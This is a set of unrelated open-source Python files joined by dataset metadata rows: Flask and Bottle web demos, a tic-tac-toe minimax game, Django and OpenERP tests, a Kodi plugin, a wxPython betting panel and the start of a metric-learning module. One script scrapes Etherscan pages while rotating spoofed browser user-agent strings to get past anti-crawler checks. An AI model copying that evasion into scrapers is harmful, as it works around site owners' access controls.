def_reflist_map = {} # map of definitions to lists of elements it references
def main():
(options, args) = parse_options()
for fname in args:
tree = ET.parse(fname)
# ET.dump(tree)
gather_ids_for_elements(tree)
gather_refs_for_defs(tree)
output_checks(options.out_dname)
sys.exit(0)
if __name__ == "__main__":
main()
| apache-2.0 | 9,097,986,886,495,331,000 | 33.962617 | 114 | 0.616947 | false | 3.552707 | false | false | false |
AdrianEriksen/ttm4128 | app.py | 1 | 1126 | from cim_client import CIMClient
from snmp_client import SNMPClient
from flask import Flask, redirect, render_template, url_for
# Initiate Flask
app = Flask(__name__)
# Frontpage method redirecting to CIM dashboard
@app.route("/")
def index():
return redirect(url_for('cim_dashboard'))
# CIM dashboard method
@app.route("/cim")
def cim_dashboard():
client = CIMClient()
try:
os_info = client.get_os_info()
except:
        os_info = 'not available'
try:
ip_interfaces = client.get_ip_interfaces()
except:
ip_interfaces = []
return render_template('cim.html',
os_info=os_info, ip_interfaces=ip_interfaces)
# SNMP dashboard method
@app.route("/snmp")
def snmp_dashboard():
snmp = SNMPClient()
try:
os_info = snmp.getOs()
except:
os_info = "Host not availible"
try:
ip_interfaces = snmp.getNetwork()
except:
ip_interfaces = []
return render_template('snmp.html',
os_info=os_info, ip_interfaces=ip_interfaces)#, url_for=url_for())
# Run the server
if __name__ == "__main__":
app.run()
| mit | 5,498,000,740,435,371,000 | 21.979592 | 74 | 0.622558 | false | 3.401813 | false | false | false |
ShikherVerma/tic-tac-toe | ttt.py | 1 | 5016 | '''
Project - Tic Tac Toe
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import sys#
import time#for wait of 1 seconds
import os
import random#for adding randomness into program so that the computer's move is not always the same
#display function start
def disp():
for x in range(3):
for y in range(3):
if a[x][y] == -100:
print "_ ",
elif a[x][y] == 0 :
print "O ",
else :
print "X ",
print "\n"
#display function end
#check function
def check():
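	"""Return -100 if the user (X) has three in a row, 100 if the computer
	(O) has three in a row, 0 if the board is full (draw) and None if the
	game can continue."""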
for x in range(3):
sumrow = a[x][0] + a[x][1] + a[x][2]
if sumrow == 3:
return -100
elif sumrow == 0:
return 100
for x in range(3):
sumcol = a[0][x] + a[1][x] + a[2][x]
if sumcol == 3:
return -100
elif sumcol == 0:
return 100
sumdiag1 = a[0][0] + a[1][1] + a[2][2]
if sumdiag1 == 3:
return -100
elif sumdiag1 == 0:
return 100
sumdiag2 = a[0][2] + a[1][1] + a[2][0]
if sumdiag2 == 3:
return -100
elif sumdiag2 == 0:
return 100
flag = 0 #flag is for checking if any move is possible
for x in range(3):
for y in range(3):
if a[x][y] == -100:
flag = 1
return
#code can be optimized here by removing flag and playing with the return statement, if loop exits the nested for then no a[][]=-100 so return 0
if flag == 0:
return 0
#check funtion end
#input
def user_move():
x = int(input())
y = int(input())
if x>2 or x < 0 or y>2 or y<0 or a[x][y] != -100 :
print "illegal move"
user_move()
else :
a[x][y] = 1
#input close
#minmax start
def minmax(game,depth,move_whose):
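	"""Recursive minimax search. move_whose is True on the user's turn
	(minimising player) and False on the computer's turn (maximising player).
	Returns a (score, trick) pair: score is 100-depth for a computer win,
	depth-100 for a user win and 0 for a draw; trick counts the trick
	positions described at the bottom of the file."""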
if check() == 100:
return 100 - depth,0
if check() == -100:
return depth - 100,0
if check() == 0:
return 0,0
maximum =-10000
minimum = 10000
trick=0
trickmaxmove=0
tricksumminmove=0
trickmat = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if game[x][y] == -100:
if move_whose:
game[x][y] = 1
else:
game[x][y] = 0
temp,trick = minmax(game,depth+1,not(move_whose))
trickmat[x][y]=trick
if (temp==100-depth-1) and not(move_whose):#dont evaluate further if move is of computer and there is an instant win,
#THIS ALSO REDUCES THE TRICK CASES WHERE WE INSTEAD OF CLAIMING INSTANT WIN , TRY TO MAKE A TRICK
game[x][y]=-100
return temp,trick
#code can be optimized by moving these conditions into the if below
if (temp==100-depth-2)and (move_whose):
trick+=1
disp()
print "\n\n"
time.sleep(1)
if move_whose:
tricksumminmove+=trick
if minimum > temp:
minimum = temp
else:
if maximum < temp:
maximum = temp
trickmaxmove=trick
game[x][y] = -100
if depth==0:
print trickmat
if move_whose:
return minimum,tricksumminmove
else:
if tricksumminmove!=0:
			print tricksumminmove
return maximum,trickmaxmove
#next move
def ttt_move():
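	"""Choose the computer's move: score every empty cell with minmax (plus
	its trick count as a bonus) and play the highest-scoring cell."""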
score = [[-10000 for x in range(3)] for x in range(3)]
trick = [[-10000 for x in range(3)] for x in range(3)]
for x in range(3):
for y in range(3):
if a[x][y] == -100:
a[x][y] = 0
score[x][y],trick[x][y] = minmax(a,0,True)#round(random.random(),2)
				score[x][y]=score[x][y]+trick[x][y]#the trick count is added as a bonus; adding round(random.random(),2) (commented out above) would introduce some randomness into the program
#depth = 0 for 1st time and 3rd parameter is whose move it is False == computer and True == user
a[x][y] = -100
maximum = -10000
bestx = 1
besty = 1
for x in range(3):
for y in range(3):
if score[x][y] > maximum:
maximum = score[x][y]
bestx = x
besty = y
a[bestx][besty] = 0
print score
print trick
#next move end
#initial choice
def initial_choice():
ans = raw_input("wanna play first?")
if ans == "n":
ttt_move()
disp()
elif ans == "y":
return
elif ans !="y":
print "type y or n"
initial_choice()
#initial_choice end
#int main
'''A trick is defined as a position where the computer wins for every reply of the opponent,
provided there is no immediate forced win already
and the opponent plays slightly imperfectly by choosing the second-best subtree.'''
a = [[-100 for x in range(3)] for x in range(3)]
initial_choice()
while True :
user_move()
disp()
if check() == -100:
sys.exit("YOU WON!!!")
elif check() == 0:
sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
print "thinking........"
time.sleep(1)
os.system('clear')
ttt_move()
disp()
if check() == 100:
sys.exit("YOU LOSE")
elif check() == 0:
sys.exit("IS THIS THE BEST YOU CAN DO???!!!")
#int main end
| gpl-3.0 | 7,665,694,044,367,622,000 | 24.591837 | 144 | 0.636563 | false | 2.760594 | false | false | false |
rvalyi/openerp-pt_br | tests_others/test_create_tax_include.py | 2 | 1060 |
def test_create_tax_include(oerp):
tax_code_obj = oerp.pool.get('account.tax.code')
tax_code_id = tax_code_obj.create(oerp.cr, 1, {
'name': 'ISS 2%',
'company_id': 1,
'sign': 1,
'tax_discount': 'TRUE',
'tax_include': 'TRUE',
'notprintable': 'TRUE',
'domain': 'iss'
})
assert tax_code_obj.browse(oerp.cr, 1, [tax_code_id])[0].id == tax_code_id
tax_obj = oerp.pool.get('account.tax')
tax_id = tax_obj.create(oerp.cr, 1, {
'sequence': '1',
'type_tax_use': 'all',
'applicable_type': 'true',
'company_id': 1,
'name': 'ISS 2%',
'amount': 0.0200,
'type': 'percent',
'tax_code_id': tax_code_id,
'base_reduction': 0.0000,
'amount_mva': 0.0000,
'price_include': 'FALSE',
'tax_discount': 'TRUE',
'tax_add': 'FALSE',
'tax_include': 'TRUE',
'tax_retain': 'FALSE',
'domain': 'iss',
})
assert tax_obj.browse(oerp.cr, 1, [tax_id])[0].id == tax_id
| agpl-3.0 | 2,861,934,955,532,070,000 | 27.648649 | 78 | 0.490566 | false | 2.888283 | false | false | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/django_openid_auth/tests/test_models.py | 4 | 3239 | # django-openid-auth - OpenID integration for django.contrib.auth
#
# Copyright (C) 2013 Canonical Ltd.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.test import TestCase
from django_openid_auth.models import (
Permission,
UserOpenID,
)
class UserOpenIDModelTestCase(TestCase):
def test_create_useropenid(self):
user = User.objects.create_user('someuser', '[email protected]',
password=None)
user_openid, created = UserOpenID.objects.get_or_create(
user=user,
claimed_id='http://example.com/existing_identity',
display_id='http://example.com/existing_identity')
self.assertEqual('someuser', user_openid.user.username)
self.assertEqual(
user_openid.claimed_id, 'http://example.com/existing_identity')
self.assertEqual(
user_openid.display_id, 'http://example.com/existing_identity')
self.assertFalse(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
def test_delete_verified_useropenid(self):
user = User.objects.create_user('someuser', '[email protected]',
password=None)
user_openid, created = UserOpenID.objects.get_or_create(
user=user,
claimed_id='http://example.com/existing_identity',
display_id='http://example.com/existing_identity')
permission = Permission.objects.get(codename='account_verified')
user.user_permissions.add(permission)
self.assertTrue(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
user_openid.delete()
self.assertFalse(
User.objects.get(username='someuser').has_perm(
'django_openid_auth.account_verified'))
| agpl-3.0 | -6,921,360,719,145,145,000 | 42.77027 | 75 | 0.692806 | false | 4.341823 | true | false | false |
yanbober/SmallReptileTraining | AndroidSpider/Spider_ethsacn.py | 1 | 1900 | #-*-coding:utf-8 -*-
# Script to save ETHSCAN records for an address
import urllib.request as urllib2
from urllib import request
import random
from bs4 import BeautifulSoup
'''
# The user_agent is the first step in the fight between crawlers and anti-crawler measures
ua_headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0',
}'''
# User-agent strings used to fake the HTTP header
ua_list = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; rv2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
]
user_agent=random.choice(ua_list)
# The Ethereum address to query
address="0xBD9d6e7489A7b450937fA7ECbAbd71Be819beE3D"
page_number_start=0
page_count=10
for ii in range(page_count):
page_number_start=page_number_start+1
page_number=str(page_number_start)
url="https://etherscan.io/txs?a="+address+"&p="+page_number
    # Build a request object via the Request() method
request1=urllib2.Request(url=url)
    # Add the header to the request
request1.add_header('User-Agent',user_agent)
    # Send the request to the given url and return the file-like object of the server response
response=urllib2.urlopen(request1)
    # The file-like object returned by the server supports the methods of a python file object
#html=response.read()
#print(html.decode('utf-8'))
soup=BeautifulSoup(response,"html.parser")
k=0
for i in soup.find_all('td',limit=400):
k=k+1
m=k%8
if m==0:
br='\n'
else:
br=''
tbody=i.get_text()
data=str(tbody.encode('gbk','ignore'))+","+br
with open('test11.csv', 'a') as f:
f.write(data)
print("已完成:",str(page_number)+"/"+str(page_count)) | mit | -6,785,151,779,548,744,000 | 26.786885 | 128 | 0.68595 | false | 2.060827 | false | false | false |
Basis/webargs | examples/bottle_example.py | 1 | 1822 | """A simple number and datetime addition JSON API.
Run the app:
$ python examples/bottle_example.py
Try the following with httpie (a cURL-like utility, http://httpie.org):
$ pip install httpie
$ http GET :5001/
$ http GET :5001/ name==Ada
$ http POST :5001/add x=40 y=2
$ http POST :5001/dateadd value=1973-04-10 addend=63
$ http POST :5001/dateadd value=2014-10-23 addend=525600 unit=minutes
"""
import datetime as dt
from bottle import route, run, error, response
from webargs import fields, validate
from webargs.bottleparser import use_args, use_kwargs
hello_args = {
'name': fields.Str(missing='Friend')
}
@route('/', method='GET')
@use_args(hello_args)
def index(args):
"""A welcome page.
"""
return {'message': 'Welcome, {}!'.format(args['name'])}
add_args = {
'x': fields.Float(required=True),
'y': fields.Float(required=True),
}
@route('/add', method='POST')
@use_kwargs(add_args)
def add(x, y):
"""An addition endpoint."""
return {'result': x + y}
dateadd_args = {
'value': fields.DateTime(required=False),
'addend': fields.Int(required=True, validate=validate.Range(min=1)),
'unit': fields.Str(missing='days', validate=validate.OneOf(['minutes', 'days']))
}
@route('/dateadd', method='POST')
@use_kwargs(dateadd_args)
def dateadd(value, addend, unit):
"""A datetime adder endpoint."""
value = value or dt.datetime.utcnow()
if unit == 'minutes':
delta = dt.timedelta(minutes=addend)
else:
delta = dt.timedelta(days=addend)
result = value + delta
return {'result': result.isoformat()}
# Return validation errors as JSON
@error(422)
def error422(err):
response.content_type = 'application/json'
return err.body
if __name__ == '__main__':
run(port=5001, reloader=True, debug=True)
| mit | 6,806,274,260,072,507,000 | 26.606061 | 84 | 0.656422 | false | 3.219081 | false | false | false |
s0faking/plugin.video.puls4 | resources/lib/base.py | 1 | 3786 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
from .app_common import log, defaultbanner, addon_handle, addon_url, translate, showNotification, kodiVersion, installAddon
from .utils import cleanText, encodeUrl
def get_InputStreamHelper(drm):
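    """Return an inputstreamhelper.Helper for MPEG-DASH with the given DRM
    (falling back to no DRM when PlayReady is unsupported) and make sure the
    matching inputstream addon is installed. Returns None if the helper
    cannot be created (e.g. on Kodi versions below 17)."""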
streamHelper = None
if kodiVersion >= 17:
try:
import inputstreamhelper
except:
installAddon('script.module.inputstreamhelper')
return streamHelper
try:
streamHelper = inputstreamhelper.Helper('mpd', drm=drm)
except Exception as ex:
if ex == 'UnsupportedDRMScheme' and drm == 'com.microsoft.playready':
streamHelper = inputstreamhelper.Helper('mpd', drm=None)
pass
else:
showNotification(translate(30018).format(drm), notificationType='ERROR')
if streamHelper and not streamHelper._has_inputstream():
# install inputstream
xbmc.executebuiltin(
'InstallAddon(' + streamHelper.inputstream_addon + ')', True)
return streamHelper
def addElement(title, fanart, icon, description, link, mode, channel='', duration=None, date='', isFolder=True,
subtitles=None, width=768, height=432, showID=None):
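    """Create a Kodi ListItem with the given metadata and artwork and add it
    to the plugin directory, encoding link, mode and showID into the item
    url. Non-folder items also get video/audio stream info attached."""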
if fanart == '':
fanart = defaultbanner
if icon == '':
icon = defaultbanner
if description == '':
description = (translate(30004))
description = cleanText(description)
title = cleanText(title)
list_item = xbmcgui.ListItem(title)
list_item.setInfo('video', {'title': title,
'Tvshowtitle': title,
'Sorttitle': title,
'Plot': description,
'Plotoutline': description,
'Aired': date,
'Studio': channel})
list_item.setArt({'thumb': icon, 'icon': icon, 'fanart': fanart})
list_item.setProperty('IsPlayable', str(not isFolder))
if not duration:
duration = 0
if not isFolder:
list_item.setInfo(type='Video', infoLabels={'mediatype': 'video'})
list_item.addStreamInfo('video', {'codec': 'h264', 'duration': int(
duration), 'aspect': 1.78, 'width': width, 'height': height})
list_item.addStreamInfo(
'audio', {'codec': 'aac', 'language': 'de', 'channels': 2})
if subtitles != None:
list_item.addStreamInfo('subtitle', {'language': 'de'})
parameters = {'link': link, 'mode': mode, 'showID': showID}
url = addon_url + '?' + encodeUrl(parameters)
xbmcplugin.addDirectoryItem(addon_handle, url, list_item, isFolder)
del list_item
def addItemsToKodi(sort):
xbmcplugin.setPluginCategory(addon_handle, 'Show')
xbmcplugin.setContent(addon_handle, 'videos')
if sort:
xbmcplugin.addSortMethod(addon_handle, xbmcplugin.SORT_METHOD_VIDEO_TITLE)
xbmcplugin.endOfDirectory(addon_handle)
log('callback done')
def play_video(url):
play_item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
del play_item
log('callback done')
def play_liveStream(path, addon, drm, tkn):
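    """Resolve a live stream via inputstream.adaptive, using the given
    inputstream addon, DRM license type and license key/token."""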
play_item = xbmcgui.ListItem(path=path)
play_item.setProperty('inputstreamaddon', addon)
play_item.setProperty('inputstream.adaptive.manifest_type', 'mpd')
play_item.setProperty('inputstream.adaptive.license_type', drm)
play_item.setProperty(
'inputstream.adaptive.manifest_update_parameter', 'full')
play_item.setProperty('inputstream.adaptive.license_key', tkn)
xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
del play_item
log('callback done')
| gpl-2.0 | 7,925,485,877,021,984,000 | 33.733945 | 123 | 0.630481 | false | 3.927386 | false | false | false |
m4sterm1nd/python | betfair/AlgoView/algomanagementpanel.py | 1 | 5683 | import wx
from algoloader import AlgorithmLoader
from wx.lib.pubsub import Publisher as pub
from publisherconstants import *
# Event IDs
ID_LOAD_ALGOS = wx.NewId()
ID_LOAD_MARKETS = wx.NewId()
class AlgoManagementPanel(wx.Panel):
def __init__(self, parent, session):
super(AlgoManagementPanel, self).__init__(parent)
self.session = session
self.InitUI()
# Load available trading algorithms
self.LoadAlgos()
self.LoadMarkets()
def InitUI(self):
font = wx.SystemSettings_GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(9)
# Refresh image for adding to refresh buttons
bitmapRefresh = wx.Bitmap('img/refresh.png')
image = wx.ImageFromBitmap(bitmapRefresh)
image = image.Scale(16, 16, wx.IMAGE_QUALITY_HIGH)
bitmapRefresh = wx.BitmapFromImage(image)
vbox1 = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
st1 = wx.StaticText(self, label='Available Algorithms')
st1.SetFont(font)
hbox1.Add(st1)
btnRefreshAlgos = wx.BitmapButton(self, ID_LOAD_ALGOS, bitmapRefresh)
hbox1.Add(btnRefreshAlgos, flag=wx.RIGHT | wx.TOP)
vbox1.Add(hbox1, flag=wx.LEFT | wx.TOP, border=10)
vbox1.Add((-1, 10))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
self.lstAlgos = wx.ListBox(self, -1)
hbox2.Add(self.lstAlgos, proportion=1, flag=wx.EXPAND)
vbox1.Add(hbox2, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
vbox1.Add((-1, 10))
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(self, label='Available ' + self.session.sessionType + ' Markets')
st2.SetFont(font)
hbox3.Add(st2)
btnRefreshMarkets = wx.BitmapButton(self, ID_LOAD_MARKETS, bitmapRefresh)
hbox3.Add(btnRefreshMarkets, flag=wx.RIGHT | wx.TOP)
vbox1.Add(hbox3, flag=wx.LEFT, border=10)
vbox1.Add((-1, 10))
hbox4 = wx.BoxSizer(wx.HORIZONTAL)
self.treeMarkets = wx.TreeCtrl(self, 1, wx.DefaultPosition, (-1, -1), wx.TR_HAS_BUTTONS | wx.TR_MULTIPLE)
hbox4.Add(self.treeMarkets, proportion=1, flag=wx.EXPAND)
vbox1.Add(hbox4, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
self.SetSizer(vbox1)
# Event handlers
self.Bind(wx.EVT_BUTTON, self.OnLoadAlgos, id=ID_LOAD_ALGOS)
self.Bind(wx.EVT_BUTTON, self.OnLoadMarkets, id=ID_LOAD_MARKETS)
self.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnMarketSelected, self.treeMarkets)
def OnLoadAlgos(self, event):
self.LoadAlgos()
def OnLoadMarkets(self, event):
self.LoadMarkets()
def LoadAlgos(self):
pub.sendMessage(SUBJECT_STATUSBAR, "Loading trading algorithms...")
self.algos = AlgorithmLoader().loadAlgorithms()
self.lstAlgos.Clear()
for algo in self.algos:
self.lstAlgos.Append(algo.name + " - " + algo.description)
pub.sendMessage(SUBJECT_STATUSBAR, "Found " + str(len(self.algos)) + " available algorithms")
return True
def LoadMarkets(self):
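        """Fetch the available markets from the session and rebuild the
        market tree, grouping markets by their menu path and attaching each
        market object to its leaf node."""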
self.markets = self.session.GetAvailableMarkets()
if self.markets == None:
return False
self.treeMarkets.DeleteAllItems()
root = self.treeMarkets.AddRoot('Markets')
# Add all markets to the tree
items = {}
for market in self.markets:
path = ''
parent = root
# Iterate over the market path
for item in market.menuPathParts:
path = path + item
if path in items:
parent = items[path]
continue
# Add this node if it doesn't exist
parent = items[path] = self.treeMarkets.AppendItem(parent, item)
# After all of the parent nodes are present, at the market type
items[path + market.marketName] = self.treeMarkets.AppendItem(items[path], market.marketName)
# Attach the market information to the tree object for extraction later
self.treeMarkets.SetPyData(items[path + market.marketName], market)
self.treeMarkets.Expand(root)
pub.sendMessage(SUBJECT_STATUSBAR,
'Found ' + str(len(self.markets)) + ' available ' + self.session.sessionType + ' markets')
return True
def OnMarketSelected(self, event):
selected = event.GetItem()
if self.treeMarkets.GetChildrenCount(selected) == 0:
mId = self.treeMarkets.GetPyData(selected).marketId
wx.MessageBox(str(self.treeMarkets.GetPyData(selected)), 'AlgoView')
#print self.bfClient.getMarket(bfpy.ExchangeUK, marketId=mId)
print self.session.GetMarketData(marketId=mId)
##print self.bfClient.getMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getMUBets(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
##print self.bfClient.getMUBetsLite(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
#print self.bfClient.getMarketProfitAndLoss(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getCompleteMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getDetailAvailableMarketDepth(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
##print self.bfClient.getMarketTradedVolume(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
#print self.bfClient.getMarketTradedVolumeCompressed(bfpy.ExchangeUK, marketId=mId)
# TODO(coreyf): Show market information in GUI
else:
event.Skip()
| gpl-2.0 | -1,328,546,920,181,080,300 | 39.021127 | 113 | 0.643146 | false | 3.549656 | false | false | false |
mdeutsch86/stocks | portfolio.py | 1 | 2459 | from asset import Asset
from stock import Stock
from savingsBook import SavingsBook
class Portfolio(object):
def __init__(self):
"""
You should first pay_in, otherwise you can not buy anything
"""
self.cash = 0.
self.stocks = {}
self.savingBooks = {}
self.others = 0.
self.performance = self.calc_performance()
self.asset_allocation = {}
def pay_in(self, amount):
self.cash += float(amount)
def calc_performance(self):
pass
def calc_asset_allocation(self):
cash = self.cash
stocks =0
savingBooks = 0
def calc_howMuch(self, price, fees):
"""
calculates how much stocks are possible to buy depending
on the cash you have on your account
"""
return (self.cash - fees)//price
def buyStock(self, stock_name, stock_price, stock_amount, stock_fee):
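        """Buy stock_amount shares of stock_name at stock_price, paying
        stock_fee, and create or update the corresponding Stock position."""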
stock_name = stock_name.upper()
        if self.cash > stock_price*stock_amount+stock_fee:
            self.cash -= stock_price*stock_amount+stock_fee
if stock_name in self.stocks.keys():
self.stocks[stock_name].update_stock(stock_price, stock_amount, stock_fee)
else:
self.stocks.update({stock_name: Stock(stock_name, stock_price, stock_amount, stock_fee)})
else:
print("You do not have enough money to buy that much stocks!!!")
def deposit_on_SavingsBook(self, bookName, amount):
bookName = bookName.upper()
if bookName in self.savingBooks.keys():
self.savingBooks[bookName].update_savingsBook(amount)
else:
self.savingBooks.update({bookName: SavingsBook(bookName, amount)})
def __str__(self):
if self.cash == 0.:
data = ''
else:
data = 'Cash: {}\n'.format(self.cash)
for key, value in self.stocks.iteritems():
data+= str(value)+'\n'
return data
if __name__ =='__main__':
import random
stockprice = [27.69,28.30,27.78,28.38,27.86,27.13,28.26,28.82,28.18,28.31]
fee = 5.0
p=Portfolio()
p.pay_in(100)
p.buyStock('KO', 27.96, 3, fee)
for i in range(10):
price = random.choice(stockprice)
p.pay_in(100)
amount = p.calc_howMuch(price,fee)
if price < p.stocks['KO'].price:
p.buyStock('KO', price, amount, fee)
print('bought')
print(p)
| mit | -3,954,065,350,930,761,000 | 29.358025 | 105 | 0.575031 | false | 3.517883 | false | false | false |
johny-c/pylmnn | pylmnn/lmnn.py | 1 | 50724 | # coding: utf-8
"""
Large Margin Nearest Neighbor Classification
"""
# Author: John Chiotellis <[email protected]>
# License: BSD 3 clause
from __future__ import print_function
from warnings import warn
import sys
import time
import numpy as np
from scipy.optimize import minimize
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.pipeline import Pipeline
from sklearn.neighbors import NearestNeighbors, KNeighborsClassifier
from sklearn.decomposition import PCA
from sklearn.utils import gen_batches
from sklearn.utils.extmath import row_norms, safe_sparse_dot
from sklearn.utils.random import check_random_state
from sklearn.utils.multiclass import check_classification_targets
from sklearn.utils.validation import check_is_fitted, check_array, check_X_y
from sklearn.exceptions import ConvergenceWarning
try:
from six import integer_types, string_types
except ImportError:
try:
from sklearn.externals.six import integer_types, string_types
except ImportError:
raise ImportError("The module six must be installed or the version of scikit-learn version must be < 0.23")
from .utils import _euclidean_distances_without_checks
class LargeMarginNearestNeighbor(BaseEstimator, TransformerMixin):
"""Distance metric learning for large margin classification.
Parameters
----------
n_neighbors : int, optional (default=3)
Number of neighbors to use as target neighbors for each sample.
n_components : int, optional (default=None)
Preferred dimensionality of the embedding.
If None it is inferred from ``init``.
init : string or numpy array, optional (default='pca')
Initialization of the linear transformation. Possible options are
'pca', 'identity' and a numpy array of shape (n_features_a,
n_features_b).
pca:
``n_components`` many principal components of the inputs passed
to :meth:`fit` will be used to initialize the transformation.
identity:
If ``n_components`` is strictly smaller than the
dimensionality of the inputs passed to :meth:`fit`, the identity
matrix will be truncated to the first ``n_components`` rows.
numpy array:
n_features_b must match the dimensionality of the inputs passed to
:meth:`fit` and n_features_a must be less than or equal to that.
If ``n_components`` is not None, n_features_a must match it.
warm_start : bool, optional, (default=False)
If True and :meth:`fit` has been called before, the solution of the
previous call to :meth:`fit` is used as the initial linear
transformation (``n_components`` and ``init`` will be ignored).
max_impostors : int, optional (default=500000)
Maximum number of impostors to consider per iteration. In the worst
case this will allow ``max_impostors * n_neighbors`` constraints to be
active.
neighbors_params : dict, optional (default=None)
Parameters to pass to a :class:`neighbors.NearestNeighbors` instance -
apart from ``n_neighbors`` - that will be used to select the target
neighbors.
weight_push_loss : float, optional (default=0.5)
A float in (0, 1], weighting the push loss. This is parameter ``μ``
in the journal paper (See references below). In practice, the objective
function will be normalized so that the push loss has weight 1 and
hence the pull loss has weight ``(1 - μ)/μ``.
impostor_store : str ['auto'|'list'|'sparse'], optional
list :
Three lists will be used to store the indices of reference
samples, the indices of their impostors and the (squared)
distances between the (sample, impostor) pairs.
sparse :
A sparse indicator matrix will be used to store the (sample,
impostor) pairs. The (squared) distances to the impostors will be
computed twice (once to determine the impostors and once to be
stored), but this option tends to be faster than 'list' as the
size of the data set increases.
auto :
Will attempt to decide the most appropriate choice of data
structure based on the values passed to :meth:`fit`.
max_iter : int, optional (default=50)
Maximum number of iterations in the optimization.
tol : float, optional (default=1e-5)
Convergence tolerance for the optimization.
callback : callable, optional (default=None)
If not None, this function is called after every iteration of the
optimizer, taking as arguments the current solution (transformation)
and the number of iterations. This might be useful in case one wants
to examine or store the transformation found after each iteration.
store_opt_result : bool, optional (default=False)
If True, the :class:`scipy.optimize.OptimizeResult` object returned by
:meth:`minimize` of `scipy.optimize` will be stored as attribute
``opt_result_``.
verbose : int, optional (default=0)
If 0, no progress messages will be printed.
If 1, progress messages will be printed to stdout.
If > 1, progress messages will be printed and the ``iprint``
parameter of :meth:`_minimize_lbfgsb` of `scipy.optimize` will be set
to ``verbose - 2``.
random_state : int or numpy.RandomState or None, optional (default=None)
A pseudo random number generator object or a seed for it if int.
n_jobs : int, optional (default=1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Attributes
----------
components_ : array, shape (n_components, n_features)
The linear transformation learned during fitting.
n_neighbors_ : int
The provided ``n_neighbors`` is decreased if it is greater than or
equal to min(number of elements in each class).
n_iter_ : int
Counts the number of iterations performed by the optimizer.
opt_result_ : scipy.optimize.OptimizeResult (optional)
A dictionary of information representing the optimization result.
This is stored only if ``store_opt_result`` is True. It contains the
following attributes:
x : ndarray
The solution of the optimization.
success : bool
Whether or not the optimizer exited successfully.
status : int
Termination status of the optimizer.
message : str
Description of the cause of the termination.
fun, jac : ndarray
Values of objective function and its Jacobian.
hess_inv : scipy.sparse.linalg.LinearOperator
the product of a vector with the approximate inverse of the
            Hessian of the objective function.
nfev : int
            Number of evaluations of the objective function.
nit : int
Number of iterations performed by the optimizer.
Examples
--------
>>> from pylmnn import LargeMarginNearestNeighbor
>>> from sklearn.neighbors import KNeighborsClassifier
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import train_test_split
>>> X, y = load_iris(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
